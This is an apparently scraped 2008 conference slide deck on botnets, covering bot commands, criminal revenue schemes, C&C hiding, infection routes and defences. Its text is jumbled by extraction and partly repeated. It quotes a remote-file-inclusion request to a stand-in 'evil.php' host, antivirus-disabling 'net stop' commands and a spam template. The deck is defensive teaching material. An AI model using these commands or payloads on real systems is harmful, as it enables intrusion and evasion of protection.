Botnets and The Army of Darkness

Botnets and the Army of Darkness
A Presentation
For
Educause Security Professionals 2008
by
Craig A Schiller, CISSP-ISSMP, ISSAP
Portland State University
CISO
craigs@pdx.edu
Copyright Craig Schiller, 2008. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.
Presentation materials from
2008 Craig A Schiller
Handbook Against the AOD
Agenda
Botnet Overview
Botnet Schemes
How Do They Get In?
What Can We Do?
Concluding Thoughts
Why are We Here?
Why are We Here?

Microsoft Senior Security Manager says Botnets are the biggest threat of 2007
Vincent Cerf, founder of the Internet, tells global finance conference that 1/4th of
all computers belong to botnets.
Norman Elton and Matt Keel from the College of William & Mary, in a 2005
presentation, called bot networks the single greatest threat facing humanity.
John Macanan, in The Evolution of Malicious IRC Bots, says that Botnets are
the most dangerous and widespread Win32 viral threat.
Microsoft reports that of the 5.7 million unique Windows systems from which
the MSRT removed malware, 62% were found to have a Trojan or bot client.
Ryan Narraine, a writer for e-week, said that botnets are the key hub for well
organized crime rings around the globe, using stolen bandwidth from drone
zombies to make money from nefarious Internet activity.
Viruses, Worms, Trojans, and Botnets

Virus Autonomous, malicious code, infects boot sector or files but
cannot spread itself to another computer. Spreads manually via
floppy disks, later by email or web download.
Worm Autonomous, malicious code, spreads across the network
via email, via network vulnerabilities
Trojan Malicious code that poses as legitimate code to get the
user to execute it.
Remote Access Trojan Malicious code which poses as legitimate
code to gain access, then permits the operator to gain remote control
of the victims computer
BotClients/Zombies Malicious code which permits a victims
computer to be controlled by an agent. The agent makes is easy for
the operator (called a bot herder) to manage and operate Tens and
Hundreds of Thousands of clients
Army of Darkness Collectively all of the zombies controlled by
botherders
What makes a Bot a Bot?

C&C
Traditional Botnet
IRC protocol
Bot
Bot
Bot
Bot
100 to 100000 botnet clients

In the original use of the term Bot, the bot client contained malicious code
that would retrieve and execute commands that were sent by the botherder.
What makes a Bot a Bot?-2

C&C
IRC protocol
Bot
Bot
Remote
controlled
clients
Terminal Services
VNC
RDP
Carbon copy
BackOrifice
SubSeven
Now, many include the systems that execute commands of the botherder even if the
malicious code is not present. These systems are remotely controlled. They would
be considered bot clients if they were part of a net of remotely controlled clients,
even if the bot mechanism is somewhere else.
Botnet Commands
Command
bot.command
bot.flushdns
bot.quit
bot.longuptime
bot will
bot.sysinfo
bot.status
bot.rndnick
bot.remove
bot.open
bot.nick
bot.id
shell.disable
shell.enable
shell.handler
commands.list
plugin.unload
supported yet)
plugin.load
inst.svcdel
inst.svcadd
mac.login
What it does
Runs a command with system()
Flushes the bots DNS cache
Quits the bot
If uptime is more than 7 days,
respond
Displays the system info
Gives status
generate a new random nick
Removes the bot
Opens a file
Changes the bots nickname
Displays the current code ID
Disable shell handler
Enable shell handler
Fallback handler for shell
Lists all available commands
Unloads a plug-in (not
Loads a plug-in
Deletes a service
Adds a service
Logs the user in
Command What it does

mac.logout
Logs the user out
ftp.update
ftps and executes a file
ftp.execute
ftps and Updates the bot
ftp.download
Downloads a file from FTP
http.visit
Visits URL with specific referrer
http.update
Executes a file from HTTP URL
http.execute
Updates the bot from HTTP
http.download
Downloads a file from HTTP
rsl.logoff
Logs the user off
rsl.shutdown
Shuts the computer down
rsl.reboot
Reboots the computer
pctrl.kill
Kills a process
pctrl.list
Lists all processes
ddos.httpflood
Starts an HTTP flood
Redirect.stop
Stops all redirects running
redirect.https
Starts an HTTP Secure proxy
redirect.http
Starts an HTTP proxy
harvest.aol
Makes the bot get AOL data
harvest.emailshttp
Get a list of e-mails via HTTP
harvest.emails
Get a list of e-mails
Source: Joe Stewart, SecureWorks

10
Evolution of Bot Technology

Evolution of Bot Technology Timeline
Saturday, March 03, 2007
A timeline showing the introduction of Bots and Bot Technology
2003
2002
SpyBot
SDBot, written in C++
Spyware capabilities
Source code Available
(keylogging,
to hacker community data mining for email addresses
2004
Small, single binary
1999
Lists of URLs,etc)
PolyBot
Pretty Park discovered
A derivative of AgoBot with
Polymorphic abilty. Changes its the
first worm to use an IRC server
look of its code on every infection
as a means of remote control
1988
Invention of IRC
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
1988
1989
Greg Lindahl invents GM the first Bot,
GM plays Hunt the Wumpus with IRC users
2002
2003
2004
2005
2006
2006
1999
SubSeven trojan/bot
A remote control trojan
added control via IRC
2005
MYTOB
My Doom
mass emailing worm
with Bot IRC C&C
2002
2003
AgoBot, Gaobot
RBot
Introduces
modular
design
2000
Most Prevalent Bot today
1st module breaks-in
GT Bot, mIRC based
Spreads through
nd
module
downloads
2
Runs scripts in response tond
weak
passwords,
IRC server events 2 module turns off anti-virus easilty modifieable,
Hides
from
detection,
Supports raw TCP and UDP
Uses packaging software
downloads 3rd module
Socket connections
Module 3 has attack
Page 1
engines/payload
11
Why Do They Do It?

$
I have ways of making money that

you know nothing of.
John D. Rockefeller
$$
12
Russian Business Network
12 Levashovskiy Prospect.
197110 Saint-Petersburg, - RU
11/21/07
Ref: David Bizeul
Bizeul.org
Russian Business Network study, by David Bizeul
13
RBN Operations
Services: Some external services are used by
RBN and affiliates. Those services can be MX
relay or NS hosting.
RBN: This is the core business of RBN. It is
used to offer Hosting for cybercrime. Inside this
part, we can identify the direct subsidiaries from
RBN : Nevacon and Akimon.
Hosting: This is the part used to host most of
RBN public websites, to register RBN domain
names Hosting and registration is a really
strong partner for RBN. Incidentally, it could be
possible that those two blocks are under the
same company.
Telecom: This is the entity which aims at
providing the Internet access. It seems that
SBTel has obtained from Silvernet to access
Saint Petersburg Internet Exchange Point
(SPBIX).
11/21/07
Ref: Bizeul.org -
14
RBN Operations
SILVERNET
CREDOLINK
RBN
OINVEST
SPB IX
DELTASYS
INFOBOX
DATAPOINT
11/21/07 Ref: Bizeul.org 2008 Craig A Schiller
15
RBN Hosted Domains

81.0.250.0
81.95.147.0
194.146.207.0
81.95.149.0
81.95.150.0
58.65.239.0
193.33.129.0
209.85.51.0
81.95.144.0
85.249.143.0
88.255.90.0
81.95.148.0
58.65.238.0
74.52.55.0
203.121.67.0
81.95.145.0
81.95.146.0
88.255.94.0
91.193.56.0
1018
49
23
21
17
13
11
10
9
7
7
6
5
5
3
3
2
2
2
UPL TELECOM (Casablanca INT)

RBN
RBN/Nevacon
RBN
RBN
HostFresh
Disk Limited
EVRY-318 (Direct Information FZC)
RBN
DATAPOINT
AbdAllah Internet Hizmetleri
RBN
Hostfresh
ThePlanet.com
TIME Telecommunications Sdn Bhd
RBN
RBN
AbdAllah Internet Hizmetleri
Disk Limited
As of 11/15/07
CZ
RU
RU
RU
RU
HK
TW
AE
RU
RU
TR
RU
HK
US
MY
RU
RU
TR
TW
16
Botnet animation
17
Denial of Service Attack
18
Botnets Life Cycle
Modular
Adaptive
Targetable
19
Spam
Spam Made Up 94% Of All E-Mail In December

Information Week article title in Jan 2007
20
Botnets and Spam
21
Spam Template
Received: from 192.168.0.%RND_DIGIT
(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])
by mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)
(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME
Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
X-Spam-Flag: YES
X-Scanned-By: milter-spamc/0.25.321 (localhost [0.0.0.0]); Thu, 01 Mar 2007
09:14:01 -0600
X-Scanned-By: milter-spamc/0.25.321 (miconsulting.com [66.34.157.130]);
Thu, 01 Mar 2007 09:14:01 -0600
X-Spam-Status: YES, hits=8.60 required=5.00
X-Spam-Level: xxxxxxxx
Subject: [SPAM]
Status: RO
%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME
%MESSAGE_BODY
22
Pump & Dump Stocks

Making Dollars and Sense Now is The Time!
SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy
Underbanked consumers are an opportunity investors can't afford

to miss, especially as new research reveals a closer look at the
breadth and potential of the market. According to a new study by
BearingPoint and Visa, approximately 84 million people are unand underbanked, representing $1.1 trillion in income. Assuming
these consumers spend 1% of their income to pay for financial
services, that amounts to $11 billion. And that is at 1%! Not bad
work if you can get it.
23
How Much Do They Make

Blue Security, a security company that took on
Spammers agressively, underwent a Distributed Denial of
Service (DDoS) attack from zombie computers under control
of a Russian speaking spammer.
This spammer (or spam gang), which we called
PharmaMaster, claimed to make $3M dollars a month off of
spam.
Unwilling to give up that income, he paid a hacker $2,000
an hour to perform the DDoS against Blue Security.
It cost him over $1M dollars by the time all was said and
done
It exhausted the funding of Blue Security and they were
forced to close shop.
24
Botnets and Movie Theft

Release Group
hires/uses botnet for
storage and
distribution
15% of Losses attribut

to College Students
25
Botnets and Clicks-4-Hire
26
Botnets and Clicks-4-Hire

Bot-driven fraud has become such a big
business that Google was recently sued by
class-action plaintiffs who claimed that bots,
not people, had clicked on their ads. The ads
were priced based on how many clicks they
received; apparently competitors had hired
bots to jack up the rate with an avalanche of
extra clicks.
Charged with negligence for failing to guard
against such abuses, Google settled for $90
Attack of the Bots , by Scott Berinato
million.
Wired 14.11 Nov 2006
27
Extortion
Weve encrypted your files.

Pay me for the key to decrypt them.
Were DDoSing your website.
Pay me to stop.
Pay me not to start.
In 2004, botnets attacked dozens of online gambling

sites. The bookmakers were told to pay between $10,000
and $50,000 to get their sites back online. (Wired, Nov
2006)
But, of course, Once you have paid him the Dane-geld, you never get rid of the Dane.
Dane-geld, by Rudyard Kipling (A.D. 980-1016 )
28
Theft Identity and other

Keystroke logging attacks
Harvesting credit cards, SSAN, keys,
passwords
[11:23]
*** :newyork.ny.us.somewhere.org 322 Justlooking

#cards 73 : Welcome. WGeTz sell fulls, msg HIM. NEW ->
(Link: www.kentmintek.com/coolindex.html)
www.kentmintek.com/coolindex.html .
WGeTz needs ITALY WU DROP.
29
Theft Identity and other

Phishing attacks
Pharming attacks
30
Phishing Overview
Botnet Client
Hosts phishing
website
Botnet Client
Sends spam
31
Money Mule
Fraudsters contact prospective victims
I am Mr. Richard H. Mason President/CEO MM Group Handling.
We are a trading company that is into the hire, sales and service of Electrical
Trucks, Fork Trucks and associated materials handling equipments and diverse
range of battery for electric vehicles which can be readily adapted for customers
specific requirements to the America and selected locations in Europe.
We are searching for individuals or a company who can act as our
representative/payment agent in your country and earn 10% of every payment
made through you to us.
2. The crime rings persuade the victim to come and work for their fake
company.
3. Money mules receive funds into their accounts.
These funds are stolen from other accounts that have been compromised.
4. Mules then are asked to take these funds out of their accounts and
forward them overseas (minus a commission payment), typically using a
wire transfer service.
Source: Bank Safe Online
32
Strategy Against Botnets

Cut off the head of the snake and the body will follow
Unless of course, your snake is a Hydra

33
How Do Botherders Protect the C&C

Multi-homed DNS
FQDN maps to 3 or more IP addresses
botnet1.example.com
botnet1.example.com
botnet1.example.com
botnet1.example.com
botnet1.example.com
botnet1.example.com
pointing
pointing
pointing
pointing
pointing
pointing
to
to
to
to
to
to
127.0.0.1
127.0.0.2
127.0.0.3
127.0.0.4
127.0.0.5
127.0.0.6
Dynamic DNS used thru commercial site

Change IP addresses quickly
Short DNS TTLs for clients
Remap DNS often, check at boot
FastFlux DNS
Change IP addresses and/or DNS names quickly
(for spam < 5 minutes) and often
34
Hiding the C&C Server or Phishing Website
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
35
Botnets for Sale

Botnet Ad on an IRC channel
[11:07] *** :newyork.ny.us.someplace.org 322 Justlooking
#Bot-Services 6 :(Lew|s-) Welcome. My BotNet is ready to
be used. You would like to profit from it? Leave a msg on
the channel, one @ will respond to you soon. Thank you!
There may be millions of such PCs around the world
doing the bidding of crime gangs, experts say, and
they can be rented for as little as $100-per-hour.
Home PCs rented out in sabotage-for-hire racket
By Bernhard Warner, Reuters
Fluid third-party exchange market (millions)
Going rate for Spam proxying 3 -10 cents/host/week
Seems small, but 25k botnet gets you $40k-130k/yr
Raw bots, .01$+/host, Special orders ($50+)
Geoffrey M Voelker, UC San Diego
36
How do they get in?

1.
2.
3.
4.
Guessing weak passwords/phishing attacks

Exploiting Network vulnerabilities
Using Social Engineering
Using web-based Trojans
Trojan websites Game cheats
Trojan websites - Pornography
5. Using Email-based Trojans
Phishing & Pharming
Trojan downloads
6. Using IM-based Trojans (Social engineering)
37
How do they get in?
1. Get /a.php?vuln=http://webhost.com/evil.php
4. The Output from evil.php is sent to Attacker
Target.com
Attacker
3. Malware PHP file evil.php is sent to Target.com

And is executed by the include() function.
2. Target makes request to wehost.com/evil.php

Webhost.com
38
Top 5 Reasons Why I think Im Safe
1. Theres nothing important on my

computer
2. My A/V program said I didnt have a virus
3. I checked and I didnt see anything
4. My Corporate firewall will protect me
5. I have a Mac/Unix computer. They dont
get viruses
39
I have a Mac/Unix computer.

I#1
checked
I didnt see
anything
platformand
for Command
& Control
Servers
Unix
Mac Trojan aimed at taking money from Mac Users
The Trojan comes disguised as a video-decoding plug-in that users are told
they must install to watch free porn clips. Instead, the software burrows into
the operating system and diverts some of the victim's future web surfing to
sites under the attacker's control. It's the professional attack on Macs that the
security community has long predicted, according to Dave Marcus, security
research manager at McAfee's Avert Lab, who said it was "written by people
who know how to write malware."
http://www.wired.com/politics/security/news/2007/11/mac_trojan
40
Firewall will protect me

I checked and I didnt see anything
Firewalls are designed to let traffic in
41

Hidden32.exe permits applications to run without using their GUI

HideUserv2.exe adds an invisible user to the administrator group
User Mode rootkits
Kernel mode rootkits
42

43
A/V Program Said No Virus

net start >>starts
net stop "Symantec antivirus client"
net stop "Symantec AntiVirus"
net stop "Trend NT Realtime Service"
net stop "Symantec AntiVirus"
net stop "Norton antivirus client"
net stop "Norton antivirus"
net stop "etrust antivirus"
Best Bot left the A/V tray icon and a fake GUI
44
A/V Program Said No Virus

45
Nothing Important
Your space, network, & processing power
I checked
and
I
didnt
see
anything
Child Pornography
Bestiality
Stolen movies, games, & software
Your access
Student records
SSAN
University resources
Your email
Your money
Your identity
46
Nothing Important
47
Protect Your Enterprise

1. Ensure that all enterprise and local accounts have strong passwords. Configure
Domain security policy to enforce this and auto-lockout
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication
4. Establish a perimeter and segregate valuable or dangerous network segments. Make
FW rules accountable and require change control
5. Establish standards for web app and other development to eliminate avoidable coding
vulnerabilities (e.g. use of mod-sec for apache websites)
6. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts
7. Install and operate IDS/IPS systems (like ourmon, snort, etc)
8. Google your own site - site:mysite.com viagra
9. Actively scan your site for vulnerabilities
10. Centralize and process logs, including workstation security and firewall logs.
11. Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence
about botnet infections.
12. Participate or join quasi-intelligence organizations and use their data in your detection
tools. Report new info. Phishing attacks to www.castlecops.com/PIRT. Botnet
clients/C&C to isotf.org.
48
Botnet Client communication

Other Bot
Clients
C&C
Computer is
Exploited
Becomes a Bot
A/V
Detection
New Bot Rallys to

let Botherder
know its joined
the team
Retrieve the Anti

A/V module
Download server
Secure the New

Bot Client
Listen to the C&C

Server/Peer for
commands
C&C
C&C
Report Result to
the C&C Channel
Retrieve the
Payload module
Execute the
commands
Download server
Possible traffic to victim
On Command,
Erase all evidence
and abandon the
client
49
How Do We Detect Them?

Bot Detection is mostly behavioral
I checked
and I didnt see anything
A/V, Anti-Spam, Anti-Spyware
Host based
Enterprise Reporting
User Help Desk Tickets
Abuse notifications
Quasi-Intelligence Organizations
Monitoring & Analysis
Ourmon
Firewall & Router logs
IDS/IPS Host and Network
Darknets, Honeypots
DNS
Server & Workstation Log analysis
Malware analysis (Sandbox)
Forensics
50
Quasi-Intelligence Organizations
Mailing lists
REN-ISAC
Botnet
Shadowserver
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Phishing
Nanog
http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
Castlecops.com
Vendor
MIRT
ISC Storm Center
PIRT
APWG
http://www.bleedingthreats.net/fwrules/
51
Closing Thoughts
Botherders are human adversaries, and can respond to detection

strategies.
David Dagon, 2007
52
Q&A
Questions?
Craig A Schiller, CISSP-ISSMP, ISSAP

craigs@pdx.edu
Portland State University
CISO
53

Botnets and The Army of Darkness

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Botnets and The Army of Darkness

Uploaded by

Copyright:

Available Formats

Botnets and the Army of Darkness

Presentation materials from

2008 Craig A Schiller

Handbook Against the AOD

2008 Craig A Schiller

2008 Craig A Schiller

Why are We Here?

2008 Craig A Schiller

Why are We Here?

Viruses, Worms, Trojans, and Botnets

What makes a Bot a Bot?

100 to 100000 botnet clients

What makes a Bot a Bot?-2

Command What it does

Source: Joe Stewart, SecureWorks

Evolution of Bot Technology

A timeline showing the introduction of Bots and Bot Technology

2008 Craig A Schiller

Why Do They Do It?

I have ways of making money that

Russian Business Network

2008 Craig A Schiller

11/21/07 Ref: Bizeul.org 2008 Craig A Schiller

RBN Hosted Domains

UPL TELECOM (Casablanca INT)

2008 Craig A Schiller

Denial of Service Attack

2008 Craig A Schiller

Botnets Life Cycle

2008 Craig A Schiller

Spam Made Up 94% Of All E-Mail In December

2008 Craig A Schiller

Botnets and Spam

2008 Craig A Schiller

Pump & Dump Stocks

Underbanked consumers are an opportunity investors can't afford

2008 Craig A Schiller

How Much Do They Make

Botnets and Movie Theft

15% of Losses attribut

2008 Craig A Schiller

Botnets and Clicks-4-Hire

2008 Craig A Schiller

Botnets and Clicks-4-Hire

Weve encrypted your files.

In 2004, botnets attacked dozens of online gambling

2008 Craig A Schiller

Theft Identity and other

*** :newyork.ny.us.somewhere.org 322 Justlooking

2008 Craig A Schiller

Theft Identity and other

2008 Craig A Schiller

Strategy Against Botnets

Unless of course, your snake is a Hydra

How Do Botherders Protect the C&C

Dynamic DNS used thru commercial site

Hiding the C&C Server or Phishing Website

2008 Craig A Schiller

Botnets for Sale

How do they get in?

Guessing weak passwords/phishing attacks

2008 Craig A Schiller

How do they get in?